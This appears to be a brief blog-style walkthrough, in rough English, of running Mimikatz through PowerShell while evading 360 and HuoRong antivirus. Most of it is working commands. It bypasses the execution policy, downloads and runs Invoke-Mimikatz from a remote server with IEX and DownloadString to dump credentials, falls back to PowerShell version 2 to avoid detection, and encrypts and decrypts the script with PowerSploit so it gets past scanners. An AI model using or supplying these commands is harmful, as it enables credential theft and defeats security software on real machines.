Some of the words
none
From a practical point of view, solve the practical problems encountered, simple record, can bypass 360 and HuoRong
Introduction
none
According to PowerShell's default policy, ps1 scripts are not allowed to execute
Get-executionpolicy indicates that the current policy is Restricted

powershell
You can change the execution policy with the administrator permission. Do not ask me why I have the administrator permission. You can not catch passwords with the normal user
Set-ExecutionPolicy Unrestricted

Actual use
PSV2
none
as we all known the easy way like this
powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
now you can use the v2 maybe can bypass some av like this
powershell -Version 2 -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Encode script
powershell
as we all know the Powersploit project, how about use this project to bypass?
Here we use the out-encryptedScript to place the script in the same directory as the MimiKatz script, and then encrypt it in turn
Import-Module .\Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password woshijiamide -Salt safety

powershell
let our ps1script up to our tar then like this
powershell.exe
IEX(New-Object Net.WebClient).DownloadString("http://192.168.159.1:8888/Out-EncryptedScript.ps1")
[String] $cmd = Get-Content .\new1.ps1
Invoke-Expression $cmd
$decrypted = de woshijiamide safety
Invoke-Expression $decrypted
Invoke-Mimikatz

none
the same way, Of course, both files are put remote, also does not affect the final effect
maybe will get some wrong, but we also can catch PW
